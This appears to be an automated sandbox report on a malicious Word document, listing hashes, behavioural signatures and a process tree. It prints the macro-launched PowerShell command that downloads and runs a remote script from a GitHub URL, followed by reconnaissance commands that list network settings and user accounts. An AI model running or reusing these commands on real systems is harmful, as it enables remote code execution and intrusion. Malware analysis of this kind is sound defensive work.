Analysis
-
max time kernel
128s -
max time network
180s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 22:42
Static task
static1
Behavioral task
behavioral1
Sample
1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a.doc
Resource
win10v2004-20220414-en
General
-
Target
1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a.doc
-
Size
40KB
-
MD5
9b7212f54d8460d8144f65d1f644bb13
-
SHA1
3c2eaba89eab872ee549f22f08fdb83e0a34ad99
-
SHA256
1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a
-
SHA512
a5db7be20fdde31a2f329ce27c60036516cf7e13418bb30a4c66a872d12061b74438dbad25ce461e0424a0eb412035e8001a61624f40d46c29ac69ec4cd2d595
Malware Config
Extracted
https://raw.githubusercontent.com/scriptsample/mal/master/cs-test.ps1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2056 2892 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 28 2056 powershell.exe 33 2056 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 2752 ipconfig.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2892 WINWORD.EXE 2892 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2056 powershell.exe 2056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
powershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2056 powershell.exe Token: SeIncreaseQuotaPrivilege 2392 WMIC.exe Token: SeSecurityPrivilege 2392 WMIC.exe Token: SeTakeOwnershipPrivilege 2392 WMIC.exe Token: SeLoadDriverPrivilege 2392 WMIC.exe Token: SeSystemProfilePrivilege 2392 WMIC.exe Token: SeSystemtimePrivilege 2392 WMIC.exe Token: SeProfSingleProcessPrivilege 2392 WMIC.exe Token: SeIncBasePriorityPrivilege 2392 WMIC.exe Token: SeCreatePagefilePrivilege 2392 WMIC.exe Token: SeBackupPrivilege 2392 WMIC.exe Token: SeRestorePrivilege 2392 WMIC.exe Token: SeShutdownPrivilege 2392 WMIC.exe Token: SeDebugPrivilege 2392 WMIC.exe Token: SeSystemEnvironmentPrivilege 2392 WMIC.exe Token: SeRemoteShutdownPrivilege 2392 WMIC.exe Token: SeUndockPrivilege 2392 WMIC.exe Token: SeManageVolumePrivilege 2392 WMIC.exe Token: 33 2392 WMIC.exe Token: 34 2392 WMIC.exe Token: 35 2392 WMIC.exe Token: 36 2392 WMIC.exe Token: SeIncreaseQuotaPrivilege 2392 WMIC.exe Token: SeSecurityPrivilege 2392 WMIC.exe Token: SeTakeOwnershipPrivilege 2392 WMIC.exe Token: SeLoadDriverPrivilege 2392 WMIC.exe Token: SeSystemProfilePrivilege 2392 WMIC.exe Token: SeSystemtimePrivilege 2392 WMIC.exe Token: SeProfSingleProcessPrivilege 2392 WMIC.exe Token: SeIncBasePriorityPrivilege 2392 WMIC.exe Token: SeCreatePagefilePrivilege 2392 WMIC.exe Token: SeBackupPrivilege 2392 WMIC.exe Token: SeRestorePrivilege 2392 WMIC.exe Token: SeShutdownPrivilege 2392 WMIC.exe Token: SeDebugPrivilege 2392 WMIC.exe Token: SeSystemEnvironmentPrivilege 2392 WMIC.exe Token: SeRemoteShutdownPrivilege 2392 WMIC.exe Token: SeUndockPrivilege 2392 WMIC.exe Token: SeManageVolumePrivilege 2392 WMIC.exe Token: 33 2392 WMIC.exe Token: 34 2392 WMIC.exe Token: 35 2392 WMIC.exe Token: 36 2392 WMIC.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
WINWORD.EXEpid process 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEpowershell.exedescription pid process target process PID 2892 wrote to memory of 2056 2892 WINWORD.EXE powershell.exe PID 2892 wrote to memory of 2056 2892 WINWORD.EXE powershell.exe PID 2056 wrote to memory of 2752 2056 powershell.exe ipconfig.exe PID 2056 wrote to memory of 2752 2056 powershell.exe ipconfig.exe PID 2056 wrote to memory of 2440 2056 powershell.exe ARP.EXE PID 2056 wrote to memory of 2440 2056 powershell.exe ARP.EXE PID 2056 wrote to memory of 2392 2056 powershell.exe WMIC.exe PID 2056 wrote to memory of 2392 2056 powershell.exe WMIC.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/scriptsample/mal/master/cs-test.ps1');"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" useraccount get /ALL3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2056-137-0x0000000000000000-mapping.dmp
-
memory/2056-139-0x00007FFDC06F0000-0x00007FFDC11B1000-memory.dmpFilesize
10.8MB
-
memory/2056-138-0x00000241E8DF0000-0x00000241E8E12000-memory.dmpFilesize
136KB
-
memory/2392-142-0x0000000000000000-mapping.dmp
-
memory/2440-141-0x0000000000000000-mapping.dmp
-
memory/2752-140-0x0000000000000000-mapping.dmp
-
memory/2892-133-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2892-134-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2892-132-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2892-131-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2892-136-0x00007FFDA96A0000-0x00007FFDA96B0000-memory.dmpFilesize
64KB
-
memory/2892-135-0x00007FFDA96A0000-0x00007FFDA96B0000-memory.dmpFilesize
64KB
-
memory/2892-130-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2892-144-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2892-145-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2892-146-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB
-
memory/2892-147-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmpFilesize
64KB